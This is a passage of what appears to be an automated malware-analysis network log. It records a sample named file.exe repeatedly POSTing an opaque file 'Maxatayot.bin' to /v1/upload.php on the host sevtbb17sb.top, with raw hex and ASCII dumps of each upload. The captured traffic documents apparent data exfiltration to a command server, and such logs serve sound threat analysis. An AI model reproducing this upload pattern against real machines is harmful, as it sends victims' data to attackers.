Oct 20, 2024 22:48:22.666791916 CEST	11124	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 42 6f 75 6e 64 61 72 79 38 35 35 33 37 34 33 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 4d 61 78 Data Ascii: ------Boundary85537434Content-Disposition: form-data; name="file"; filename="Maxatayot.bin"Content-Type: application/octet-streamoIcvx_V&i4=~Yi]pjA<- )bYa,KpiNQT( UsDmogp1v5y
Oct 20, 2024 22:48:22.671794891 CEST	1236	OUT	Data Raw: ca 6d c4 97 b0 27 97 1f d5 92 55 8d 8f ed 0e 8f 8c 0f 52 44 08 b9 ac 63 09 1b c1 5e ef e9 44 2a 14 0e 11 76 83 44 41 49 ee b6 bd f0 9a 9a b6 33 6d b2 ac 71 8e f0 dd 7f 98 6c 92 74 62 b5 d6 7b 82 2f c2 ba 73 7b 60 ed fc a1 6d 76 a9 39 33 68 e0 df Data Ascii: m'URDc^DvDAI3mqltb{/s{`mv93h9?,.RZmDTqdcRZ9Gv7@&s>%e>.HV]2VqGgx)\m6lYHGCU=S!3&A^VJ$IUn
Oct 20, 2024 22:48:22.671849012 CEST	2472	OUT	Data Raw: 93 2b b0 a6 51 db e6 98 de a3 41 00 ae 73 77 41 b9 8e 4a 69 c1 a5 ce 86 99 cb 41 72 76 0d 34 a1 dd 11 01 80 cb 0a 7a ee a4 11 ad 37 b9 27 87 27 71 00 99 d3 cf 28 76 5b 37 d4 9d 7e fb c6 39 2b 62 5a b0 f5 1b 39 f0 30 8a a2 31 10 2c 2c 2b 51 02 2e Data Ascii: +QAswAJiArv4z7''q(v[7~9+bZ901,,+Q.pNDuzW<)BTGwqq*pIIm!!]Pf}EL#F-wVA0h '!5cY[54./1U?.3k`dtH>b_PX<)
Oct 20, 2024 22:48:22.671941996 CEST	7416	OUT	Data Raw: f1 21 e7 2f a0 8b de 92 9a ba 0a e9 4e 24 39 55 73 37 ee 8f 2e f3 d7 2b 26 4f d7 5d e6 87 0a 33 ad 4b da 50 a2 ce 6e 24 c9 9f 50 aa 90 ae fd ed 00 31 5b 92 14 94 fc 23 d9 8f 49 85 ff b5 63 0a 2c 44 80 af 73 ac 91 33 81 d2 5a cf 65 51 ae b1 ef 9c Data Ascii: !/N$9Us7.+&O]3KPn$P1[#Ic,Ds3ZeQuj#8dOo5<I&CdDUPAf9=P2ELV~.,ra+jBp]Q{pq;E:K*lnEq"J>V>{M-h;Q
Oct 20, 2024 22:48:22.671974897 CEST	2472	OUT	Data Raw: 5a 27 a9 1b cb 5b 6b b7 d4 cd 11 bf 07 fb 0b f4 20 b9 b3 e3 9e 70 25 6a 38 02 68 dc 57 02 d0 79 e8 0c dc 25 bc 8a 47 dc 42 36 14 17 bc ff 36 29 d9 05 6e b5 40 f1 5c 92 bc bd b5 51 34 4d 06 1a bb 65 dc 19 35 5a 2f b0 b2 ec 1e 45 40 02 12 f5 7f 1f Data Ascii: Z'[k p%j8hWy%GB66)n@\Q4Me5Z/E@&E."4\|,u-0qD45MG}4DQ;\.2\=SS2iR~Pd]4(kWbBZ!D.?_{kUmV&hwyjCTv
Oct 20, 2024 22:48:22.672041893 CEST	2472	OUT	Data Raw: 6b d3 74 12 23 08 ec 82 30 81 e4 ed 73 78 a3 5e 20 7d e2 bb b5 2a bc 76 9c 6b c9 e8 27 e3 ad 5e 94 da 21 46 ab b5 8b 2c b1 4a b8 c2 85 3a 6c ff e0 fc 03 df 3d 59 c3 76 b7 7f 26 5a 10 97 3f af 13 9e 3b 69 ab 8c c1 f1 f5 d3 5a 78 f1 25 5e ea 6e 7c Data Ascii: kt#0sx^ }vk'^!F,J:l=Yv&Z?;iZx%^n\|QOF(^\|Ckf7L5P2[2G+ad(gsG.5.S;DV.~;%V=G]/ZL7i.^R9LQ
Oct 20, 2024 22:48:22.672075987 CEST	2521	OUT	Data Raw: 4d 94 29 ed 98 ef 23 7d 61 67 0c f8 4e 3b 0e e9 57 d0 2d 52 ee f8 3f fe 57 59 e6 57 5e 9f 88 ad b6 94 b7 4f f4 a0 5c 6e f5 4a 19 29 6d 02 3e 47 06 70 69 32 c3 e6 65 a7 1f 08 6c ad 2f a3 5a cb 72 f6 3d 75 33 b0 84 31 45 95 a2 06 7e 65 7d 62 d9 e0 Data Ascii: M)#}agN;W-R?WYW^O\nJ)m>Gpi2el/Zr=u31E~e}b0OXd=){7UBkZPG\zIRo_c Wi>p8y\pR=7(;99> :U_ :Q(79]{{GA&j-1cJZ*

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
47	192.168.2.4	49896	193.46.218.44	80	6356	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
Oct 20, 2024 22:48:24.070563078 CEST	335	OUT	POST /v1/upload.php HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Content-Type: multipart/form-data; boundary=----Boundary85537434 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 Content-Length: 29713 Host: sevtbb17sb.top
Oct 20, 2024 22:48:24.070607901 CEST	11124	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 42 6f 75 6e 64 61 72 79 38 35 35 33 37 34 33 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 4d 61 78 Data Ascii: ------Boundary85537434Content-Disposition: form-data; name="file"; filename="Maxatayot.bin"Content-Type: application/octet-streamoIcvx_V&i4=~Yi]pjA<- )bYa,KpiNQT( UsDmogp1v5y
Oct 20, 2024 22:48:24.075539112 CEST	1236	OUT	Data Raw: ca 6d c4 97 b0 27 97 1f d5 92 55 8d 8f ed 0e 8f 8c 0f 52 44 08 b9 ac 63 09 1b c1 5e ef e9 44 2a 14 0e 11 76 83 44 41 49 ee b6 bd f0 9a 9a b6 33 6d b2 ac 71 8e f0 dd 7f 98 6c 92 74 62 b5 d6 7b 82 2f c2 ba 73 7b 60 ed fc a1 6d 76 a9 39 33 68 e0 df Data Ascii: m'URDc^DvDAI3mqltb{/s{`mv93h9?,.RZmDTqdcRZ9Gv7@&s>%e>.HV]2VqGgx)\m6lYHGCU=S!3&A^VJ$IUn
Oct 20, 2024 22:48:24.075558901 CEST	2472	OUT	Data Raw: 93 2b b0 a6 51 db e6 98 de a3 41 00 ae 73 77 41 b9 8e 4a 69 c1 a5 ce 86 99 cb 41 72 76 0d 34 a1 dd 11 01 80 cb 0a 7a ee a4 11 ad 37 b9 27 87 27 71 00 99 d3 cf 28 76 5b 37 d4 9d 7e fb c6 39 2b 62 5a b0 f5 1b 39 f0 30 8a a2 31 10 2c 2c 2b 51 02 2e Data Ascii: +QAswAJiArv4z7''q(v[7~9+bZ901,,+Q.pNDuzW<)BTGwqq*pIIm!!]Pf}EL#F-wVA0h '!5cY[54./1U?.3k`dtH>b_PX<)
Oct 20, 2024 22:48:24.075608969 CEST	2472	OUT	Data Raw: f1 21 e7 2f a0 8b de 92 9a ba 0a e9 4e 24 39 55 73 37 ee 8f 2e f3 d7 2b 26 4f d7 5d e6 87 0a 33 ad 4b da 50 a2 ce 6e 24 c9 9f 50 aa 90 ae fd ed 00 31 5b 92 14 94 fc 23 d9 8f 49 85 ff b5 63 0a 2c 44 80 af 73 ac 91 33 81 d2 5a cf 65 51 ae b1 ef 9c Data Ascii: !/N$9Us7.+&O]3KPn$P1[#Ic,Ds3ZeQuj#8dOo5<I&CdDUPAf9=P2ELV~.,ra+jBp]Q{pq;E:K*lnEq"J>V>{M-h;Q
Oct 20, 2024 22:48:24.075660944 CEST	2472	OUT	Data Raw: ca 9a 87 30 95 f7 0b 72 5f 9f f6 c7 51 86 83 d6 74 9e e1 4e 35 43 91 a0 2b 3f 43 72 c7 dd 62 39 c8 94 86 f9 ab b1 79 67 32 bb 0b bd d3 52 f6 7f 28 57 46 95 e6 71 b7 a0 4c 9c d2 00 d8 c8 26 ed 8b 61 17 01 a0 a8 7a 07 2b c6 85 2d ef 1f 06 48 fd b1 Data Ascii: 0r_QtN5C+?Crb9yg2R(WFqL&az+-H!#M[6?,_1!G1U?& ;1n`%$`WiFMY7vk@(Y4])T.Z{U4FG\|:@myJ}d8=PA<TX6H
Oct 20, 2024 22:48:24.075691938 CEST	2472	OUT	Data Raw: 36 08 84 94 1b 32 03 9d 68 e0 78 bf 78 8c a6 3c 61 e7 e2 e2 04 e8 49 9d 79 f8 54 e8 08 f1 c1 8a 01 9e 5a d5 db 84 86 55 41 b5 fb 0b ff 50 af 9d 9c d5 0d 5b d8 2c b6 fb 60 30 6a cc d3 ec 47 8a c8 e0 fd 66 21 80 97 aa 60 5a 62 a7 d6 30 69 fa c1 2d Data Ascii: 62hxx<aIyTZUAP[,`0jGf!`Zb0i-fXD IWZv^Vli-q]b$UtT-w(3X)eeo64z g:w88}dxN]3<F"'JqC^OUB
Oct 20, 2024 22:48:24.075716019 CEST	2472	OUT	Data Raw: 5a 27 a9 1b cb 5b 6b b7 d4 cd 11 bf 07 fb 0b f4 20 b9 b3 e3 9e 70 25 6a 38 02 68 dc 57 02 d0 79 e8 0c dc 25 bc 8a 47 dc 42 36 14 17 bc ff 36 29 d9 05 6e b5 40 f1 5c 92 bc bd b5 51 34 4d 06 1a bb 65 dc 19 35 5a 2f b0 b2 ec 1e 45 40 02 12 f5 7f 1f Data Ascii: Z'[k p%j8hWy%GB66)n@\Q4Me5Z/E@&E."4\|,u-0qD45MG}4DQ;\.2\=SS2iR~Pd]4(kWbBZ!D.?_{kUmV&hwyjCTv
Oct 20, 2024 22:48:24.075737000 CEST	2472	OUT	Data Raw: 6b d3 74 12 23 08 ec 82 30 81 e4 ed 73 78 a3 5e 20 7d e2 bb b5 2a bc 76 9c 6b c9 e8 27 e3 ad 5e 94 da 21 46 ab b5 8b 2c b1 4a b8 c2 85 3a 6c ff e0 fc 03 df 3d 59 c3 76 b7 7f 26 5a 10 97 3f af 13 9e 3b 69 ab 8c c1 f1 f5 d3 5a 78 f1 25 5e ea 6e 7c Data Ascii: kt#0sx^ }vk'^!F,J:l=Yv&Z?;iZx%^n\|QOF(^\|Ckf7L5P2[2G+ad(gsG.5.S;DV.~;%V=G]/ZL7i.^R9LQ
Oct 20, 2024 22:48:24.075802088 CEST	2521	OUT	Data Raw: 4d 94 29 ed 98 ef 23 7d 61 67 0c f8 4e 3b 0e e9 57 d0 2d 52 ee f8 3f fe 57 59 e6 57 5e 9f 88 ad b6 94 b7 4f f4 a0 5c 6e f5 4a 19 29 6d 02 3e 47 06 70 69 32 c3 e6 65 a7 1f 08 6c ad 2f a3 5a cb 72 f6 3d 75 33 b0 84 31 45 95 a2 06 7e 65 7d 62 d9 e0 Data Ascii: M)#}agN;W-R?WYW^O\nJ)m>Gpi2el/Zr=u31E~e}b0OXd=){7UBkZPG\zIRo_c Wi>p8y\pR=7(;99> :U_ :Q(79]{{GA&j-1cJZ*

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
48	192.168.2.4	49902	193.46.218.44	80	6356	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
Oct 20, 2024 22:48:25.508630991 CEST	335	OUT	POST /v1/upload.php HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Content-Type: multipart/form-data; boundary=----Boundary85537434 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 Content-Length: 29713 Host: sevtbb17sb.top
Oct 20, 2024 22:48:25.508688927 CEST	11124	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 42 6f 75 6e 64 61 72 79 38 35 35 33 37 34 33 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 4d 61 78 Data Ascii: ------Boundary85537434Content-Disposition: form-data; name="file"; filename="Maxatayot.bin"Content-Type: application/octet-streamoIcvx_V&i4=~Yi]pjA<- )bYa,KpiNQT( UsDmogp1v5y
Oct 20, 2024 22:48:25.513600111 CEST	1236	OUT	Data Raw: ca 6d c4 97 b0 27 97 1f d5 92 55 8d 8f ed 0e 8f 8c 0f 52 44 08 b9 ac 63 09 1b c1 5e ef e9 44 2a 14 0e 11 76 83 44 41 49 ee b6 bd f0 9a 9a b6 33 6d b2 ac 71 8e f0 dd 7f 98 6c 92 74 62 b5 d6 7b 82 2f c2 ba 73 7b 60 ed fc a1 6d 76 a9 39 33 68 e0 df Data Ascii: m'URDc^DvDAI3mqltb{/s{`mv93h9?,.RZmDTqdcRZ9Gv7@&s>%e>.HV]2VqGgx)\m6lYHGCU=S!3&A^VJ$IUn
Oct 20, 2024 22:48:25.513664007 CEST	2472	OUT	Data Raw: 93 2b b0 a6 51 db e6 98 de a3 41 00 ae 73 77 41 b9 8e 4a 69 c1 a5 ce 86 99 cb 41 72 76 0d 34 a1 dd 11 01 80 cb 0a 7a ee a4 11 ad 37 b9 27 87 27 71 00 99 d3 cf 28 76 5b 37 d4 9d 7e fb c6 39 2b 62 5a b0 f5 1b 39 f0 30 8a a2 31 10 2c 2c 2b 51 02 2e Data Ascii: +QAswAJiArv4z7''q(v[7~9+bZ901,,+Q.pNDuzW<)BTGwqq*pIIm!!]Pf}EL#F-wVA0h '!5cY[54./1U?.3k`dtH>b_PX<)
Oct 20, 2024 22:48:25.513674974 CEST	2472	OUT	Data Raw: f1 21 e7 2f a0 8b de 92 9a ba 0a e9 4e 24 39 55 73 37 ee 8f 2e f3 d7 2b 26 4f d7 5d e6 87 0a 33 ad 4b da 50 a2 ce 6e 24 c9 9f 50 aa 90 ae fd ed 00 31 5b 92 14 94 fc 23 d9 8f 49 85 ff b5 63 0a 2c 44 80 af 73 ac 91 33 81 d2 5a cf 65 51 ae b1 ef 9c Data Ascii: !/N$9Us7.+&O]3KPn$P1[#Ic,Ds3ZeQuj#8dOo5<I&CdDUPAf9=P2ELV~.,ra+jBp]Q{pq;E:K*lnEq"J>V>{M-h;Q
Oct 20, 2024 22:48:25.513712883 CEST	2472	OUT	Data Raw: ca 9a 87 30 95 f7 0b 72 5f 9f f6 c7 51 86 83 d6 74 9e e1 4e 35 43 91 a0 2b 3f 43 72 c7 dd 62 39 c8 94 86 f9 ab b1 79 67 32 bb 0b bd d3 52 f6 7f 28 57 46 95 e6 71 b7 a0 4c 9c d2 00 d8 c8 26 ed 8b 61 17 01 a0 a8 7a 07 2b c6 85 2d ef 1f 06 48 fd b1 Data Ascii: 0r_QtN5C+?Crb9yg2R(WFqL&az+-H!#M[6?,_1!G1U?& ;1n`%$`WiFMY7vk@(Y4])T.Z{U4FG\|:@myJ}d8=PA<TX6H
Oct 20, 2024 22:48:25.513760090 CEST	2472	OUT	Data Raw: 36 08 84 94 1b 32 03 9d 68 e0 78 bf 78 8c a6 3c 61 e7 e2 e2 04 e8 49 9d 79 f8 54 e8 08 f1 c1 8a 01 9e 5a d5 db 84 86 55 41 b5 fb 0b ff 50 af 9d 9c d5 0d 5b d8 2c b6 fb 60 30 6a cc d3 ec 47 8a c8 e0 fd 66 21 80 97 aa 60 5a 62 a7 d6 30 69 fa c1 2d Data Ascii: 62hxx<aIyTZUAP[,`0jGf!`Zb0i-fXD IWZv^Vli-q]b$UtT-w(3X)eeo64z g:w88}dxN]3<F"'JqC^OUB
Oct 20, 2024 22:48:25.513798952 CEST	2472	OUT	Data Raw: 5a 27 a9 1b cb 5b 6b b7 d4 cd 11 bf 07 fb 0b f4 20 b9 b3 e3 9e 70 25 6a 38 02 68 dc 57 02 d0 79 e8 0c dc 25 bc 8a 47 dc 42 36 14 17 bc ff 36 29 d9 05 6e b5 40 f1 5c 92 bc bd b5 51 34 4d 06 1a bb 65 dc 19 35 5a 2f b0 b2 ec 1e 45 40 02 12 f5 7f 1f Data Ascii: Z'[k p%j8hWy%GB66)n@\Q4Me5Z/E@&E."4\|,u-0qD45MG}4DQ;\.2\=SS2iR~Pd]4(kWbBZ!D.?_{kUmV&hwyjCTv
Oct 20, 2024 22:48:25.513820887 CEST	2472	OUT	Data Raw: 6b d3 74 12 23 08 ec 82 30 81 e4 ed 73 78 a3 5e 20 7d e2 bb b5 2a bc 76 9c 6b c9 e8 27 e3 ad 5e 94 da 21 46 ab b5 8b 2c b1 4a b8 c2 85 3a 6c ff e0 fc 03 df 3d 59 c3 76 b7 7f 26 5a 10 97 3f af 13 9e 3b 69 ab 8c c1 f1 f5 d3 5a 78 f1 25 5e ea 6e 7c Data Ascii: kt#0sx^ }vk'^!F,J:l=Yv&Z?;iZx%^n\|QOF(^\|Ckf7L5P2[2G+ad(gsG.5.S;DV.~;%V=G]/ZL7i.^R9LQ
Oct 20, 2024 22:48:25.513858080 CEST	2521	OUT	Data Raw: 4d 94 29 ed 98 ef 23 7d 61 67 0c f8 4e 3b 0e e9 57 d0 2d 52 ee f8 3f fe 57 59 e6 57 5e 9f 88 ad b6 94 b7 4f f4 a0 5c 6e f5 4a 19 29 6d 02 3e 47 06 70 69 32 c3 e6 65 a7 1f 08 6c ad 2f a3 5a cb 72 f6 3d 75 33 b0 84 31 45 95 a2 06 7e 65 7d 62 d9 e0 Data Ascii: M)#}agN;W-R?WYW^O\nJ)m>Gpi2el/Zr=u31E~e}b0OXd=){7UBkZPG\zIRo_c Wi>p8y\pR=7(;99> :U_ :Q(79]{{GA&j-1cJZ*

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
49	192.168.2.4	49913	193.46.218.44	80	6356	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
Oct 20, 2024 22:48:27.192687035 CEST	335	OUT	POST /v1/upload.php HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Content-Type: multipart/form-data; boundary=----Boundary85537434 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 Content-Length: 29713 Host: sevtbb17sb.top
Oct 20, 2024 22:48:27.192738056 CEST	11124	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 42 6f 75 6e 64 61 72 79 38 35 35 33 37 34 33 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 4d 61 78 Data Ascii: ------Boundary85537434Content-Disposition: form-data; name="file"; filename="Maxatayot.bin"Content-Type: application/octet-streamoIcvx_V&i4=~Yi]pjA<- )bYa,KpiNQT( UsDmogp1v5y
Oct 20, 2024 22:48:27.198115110 CEST	1236	OUT	Data Raw: ca 6d c4 97 b0 27 97 1f d5 92 55 8d 8f ed 0e 8f 8c 0f 52 44 08 b9 ac 63 09 1b c1 5e ef e9 44 2a 14 0e 11 76 83 44 41 49 ee b6 bd f0 9a 9a b6 33 6d b2 ac 71 8e f0 dd 7f 98 6c 92 74 62 b5 d6 7b 82 2f c2 ba 73 7b 60 ed fc a1 6d 76 a9 39 33 68 e0 df Data Ascii: m'URDc^DvDAI3mqltb{/s{`mv93h9?,.RZmDTqdcRZ9Gv7@&s>%e>.HV]2VqGgx)\m6lYHGCU=S!3&A^VJ$IUn
Oct 20, 2024 22:48:27.198127031 CEST	2472	OUT	Data Raw: 93 2b b0 a6 51 db e6 98 de a3 41 00 ae 73 77 41 b9 8e 4a 69 c1 a5 ce 86 99 cb 41 72 76 0d 34 a1 dd 11 01 80 cb 0a 7a ee a4 11 ad 37 b9 27 87 27 71 00 99 d3 cf 28 76 5b 37 d4 9d 7e fb c6 39 2b 62 5a b0 f5 1b 39 f0 30 8a a2 31 10 2c 2c 2b 51 02 2e Data Ascii: +QAswAJiArv4z7''q(v[7~9+bZ901,,+Q.pNDuzW<)BTGwqq*pIIm!!]Pf}EL#F-wVA0h '!5cY[54./1U?.3k`dtH>b_PX<)
Oct 20, 2024 22:48:27.198163033 CEST	2472	OUT	Data Raw: f1 21 e7 2f a0 8b de 92 9a ba 0a e9 4e 24 39 55 73 37 ee 8f 2e f3 d7 2b 26 4f d7 5d e6 87 0a 33 ad 4b da 50 a2 ce 6e 24 c9 9f 50 aa 90 ae fd ed 00 31 5b 92 14 94 fc 23 d9 8f 49 85 ff b5 63 0a 2c 44 80 af 73 ac 91 33 81 d2 5a cf 65 51 ae b1 ef 9c Data Ascii: !/N$9Us7.+&O]3KPn$P1[#Ic,Ds3ZeQuj#8dOo5<I&CdDUPAf9=P2ELV~.,ra+jBp]Q{pq;E:K*lnEq"J>V>{M-h;Q
Oct 20, 2024 22:48:27.198218107 CEST	2472	OUT	Data Raw: ca 9a 87 30 95 f7 0b 72 5f 9f f6 c7 51 86 83 d6 74 9e e1 4e 35 43 91 a0 2b 3f 43 72 c7 dd 62 39 c8 94 86 f9 ab b1 79 67 32 bb 0b bd d3 52 f6 7f 28 57 46 95 e6 71 b7 a0 4c 9c d2 00 d8 c8 26 ed 8b 61 17 01 a0 a8 7a 07 2b c6 85 2d ef 1f 06 48 fd b1 Data Ascii: 0r_QtN5C+?Crb9yg2R(WFqL&az+-H!#M[6?,_1!G1U?& ;1n`%$`WiFMY7vk@(Y4])T.Z{U4FG\|:@myJ}d8=PA<TX6H
Oct 20, 2024 22:48:27.198251009 CEST	2472	OUT	Data Raw: 36 08 84 94 1b 32 03 9d 68 e0 78 bf 78 8c a6 3c 61 e7 e2 e2 04 e8 49 9d 79 f8 54 e8 08 f1 c1 8a 01 9e 5a d5 db 84 86 55 41 b5 fb 0b ff 50 af 9d 9c d5 0d 5b d8 2c b6 fb 60 30 6a cc d3 ec 47 8a c8 e0 fd 66 21 80 97 aa 60 5a 62 a7 d6 30 69 fa c1 2d Data Ascii: 62hxx<aIyTZUAP[,`0jGf!`Zb0i-fXD IWZv^Vli-q]b$UtT-w(3X)eeo64z g:w88}dxN]3<F"'JqC^OUB
Oct 20, 2024 22:48:27.198265076 CEST	2472	OUT	Data Raw: 5a 27 a9 1b cb 5b 6b b7 d4 cd 11 bf 07 fb 0b f4 20 b9 b3 e3 9e 70 25 6a 38 02 68 dc 57 02 d0 79 e8 0c dc 25 bc 8a 47 dc 42 36 14 17 bc ff 36 29 d9 05 6e b5 40 f1 5c 92 bc bd b5 51 34 4d 06 1a bb 65 dc 19 35 5a 2f b0 b2 ec 1e 45 40 02 12 f5 7f 1f Data Ascii: Z'[k p%j8hWy%GB66)n@\Q4Me5Z/E@&E."4\|,u-0qD45MG}4DQ;\.2\=SS2iR~Pd]4(kWbBZ!D.?_{kUmV&hwyjCTv
Oct 20, 2024 22:48:27.198298931 CEST	2472	OUT	Data Raw: 6b d3 74 12 23 08 ec 82 30 81 e4 ed 73 78 a3 5e 20 7d e2 bb b5 2a bc 76 9c 6b c9 e8 27 e3 ad 5e 94 da 21 46 ab b5 8b 2c b1 4a b8 c2 85 3a 6c ff e0 fc 03 df 3d 59 c3 76 b7 7f 26 5a 10 97 3f af 13 9e 3b 69 ab 8c c1 f1 f5 d3 5a 78 f1 25 5e ea 6e 7c Data Ascii: kt#0sx^ }vk'^!F,J:l=Yv&Z?;iZx%^n\|QOF(^\|Ckf7L5P2[2G+ad(gsG.5.S;DV.~;%V=G]/ZL7i.^R9LQ
Oct 20, 2024 22:48:27.198327065 CEST	2521	OUT	Data Raw: 4d 94 29 ed 98 ef 23 7d 61 67 0c f8 4e 3b 0e e9 57 d0 2d 52 ee f8 3f fe 57 59 e6 57 5e 9f 88 ad b6 94 b7 4f f4 a0 5c 6e f5 4a 19 29 6d 02 3e 47 06 70 69 32 c3 e6 65 a7 1f 08 6c ad 2f a3 5a cb 72 f6 3d 75 33 b0 84 31 45 95 a2 06 7e 65 7d 62 d9 e0 Data Ascii: M)#}agN;W-R?WYW^O\nJ)m>Gpi2el/Zr=u31E~e}b0OXd=){7UBkZPG\zIRo_c Wi>p8y\pR=7(;99> :U_ :Q(79]{{GA&j-1cJZ*

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
50	192.168.2.4	49919	193.46.218.44	80	6356	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
Oct 20, 2024 22:48:28.650008917 CEST	335	OUT	POST /v1/upload.php HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Content-Type: multipart/form-data; boundary=----Boundary85537434 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 Content-Length: 29713 Host: sevtbb17sb.top
Oct 20, 2024 22:48:28.650068045 CEST	11124	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 42 6f 75 6e 64 61 72 79 38 35 35 33 37 34 33 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 4d 61 78 Data Ascii: ------Boundary85537434Content-Disposition: form-data; name="file"; filename="Maxatayot.bin"Content-Type: application/octet-streamoIcvx_V&i4=~Yi]pjA<- )bYa,KpiNQT( UsDmogp1v5y
Oct 20, 2024 22:48:28.655122042 CEST	1236	OUT	Data Raw: ca 6d c4 97 b0 27 97 1f d5 92 55 8d 8f ed 0e 8f 8c 0f 52 44 08 b9 ac 63 09 1b c1 5e ef e9 44 2a 14 0e 11 76 83 44 41 49 ee b6 bd f0 9a 9a b6 33 6d b2 ac 71 8e f0 dd 7f 98 6c 92 74 62 b5 d6 7b 82 2f c2 ba 73 7b 60 ed fc a1 6d 76 a9 39 33 68 e0 df Data Ascii: m'URDc^DvDAI3mqltb{/s{`mv93h9?,.RZmDTqdcRZ9Gv7@&s>%e>.HV]2VqGgx)\m6lYHGCU=S!3&A^VJ$IUn
Oct 20, 2024 22:48:28.655134916 CEST	2472	OUT	Data Raw: 93 2b b0 a6 51 db e6 98 de a3 41 00 ae 73 77 41 b9 8e 4a 69 c1 a5 ce 86 99 cb 41 72 76 0d 34 a1 dd 11 01 80 cb 0a 7a ee a4 11 ad 37 b9 27 87 27 71 00 99 d3 cf 28 76 5b 37 d4 9d 7e fb c6 39 2b 62 5a b0 f5 1b 39 f0 30 8a a2 31 10 2c 2c 2b 51 02 2e Data Ascii: +QAswAJiArv4z7''q(v[7~9+bZ901,,+Q.pNDuzW<)BTGwqq*pIIm!!]Pf}EL#F-wVA0h '!5cY[54./1U?.3k`dtH>b_PX<)
Oct 20, 2024 22:48:28.655164003 CEST	2472	OUT	Data Raw: f1 21 e7 2f a0 8b de 92 9a ba 0a e9 4e 24 39 55 73 37 ee 8f 2e f3 d7 2b 26 4f d7 5d e6 87 0a 33 ad 4b da 50 a2 ce 6e 24 c9 9f 50 aa 90 ae fd ed 00 31 5b 92 14 94 fc 23 d9 8f 49 85 ff b5 63 0a 2c 44 80 af 73 ac 91 33 81 d2 5a cf 65 51 ae b1 ef 9c Data Ascii: !/N$9Us7.+&O]3KPn$P1[#Ic,Ds3ZeQuj#8dOo5<I&CdDUPAf9=P2ELV~.,ra+jBp]Q{pq;E:K*lnEq"J>V>{M-h;Q
Oct 20, 2024 22:48:28.655232906 CEST	2472	OUT	Data Raw: ca 9a 87 30 95 f7 0b 72 5f 9f f6 c7 51 86 83 d6 74 9e e1 4e 35 43 91 a0 2b 3f 43 72 c7 dd 62 39 c8 94 86 f9 ab b1 79 67 32 bb 0b bd d3 52 f6 7f 28 57 46 95 e6 71 b7 a0 4c 9c d2 00 d8 c8 26 ed 8b 61 17 01 a0 a8 7a 07 2b c6 85 2d ef 1f 06 48 fd b1 Data Ascii: 0r_QtN5C+?Crb9yg2R(WFqL&az+-H!#M[6?,_1!G1U?& ;1n`%$`WiFMY7vk@(Y4])T.Z{U4FG\|:@myJ}d8=PA<TX6H
Oct 20, 2024 22:48:28.655241966 CEST	2472	OUT	Data Raw: 36 08 84 94 1b 32 03 9d 68 e0 78 bf 78 8c a6 3c 61 e7 e2 e2 04 e8 49 9d 79 f8 54 e8 08 f1 c1 8a 01 9e 5a d5 db 84 86 55 41 b5 fb 0b ff 50 af 9d 9c d5 0d 5b d8 2c b6 fb 60 30 6a cc d3 ec 47 8a c8 e0 fd 66 21 80 97 aa 60 5a 62 a7 d6 30 69 fa c1 2d Data Ascii: 62hxx<aIyTZUAP[,`0jGf!`Zb0i-fXD IWZv^Vli-q]b$UtT-w(3X)eeo64z g:w88}dxN]3<F"'JqC^OUB
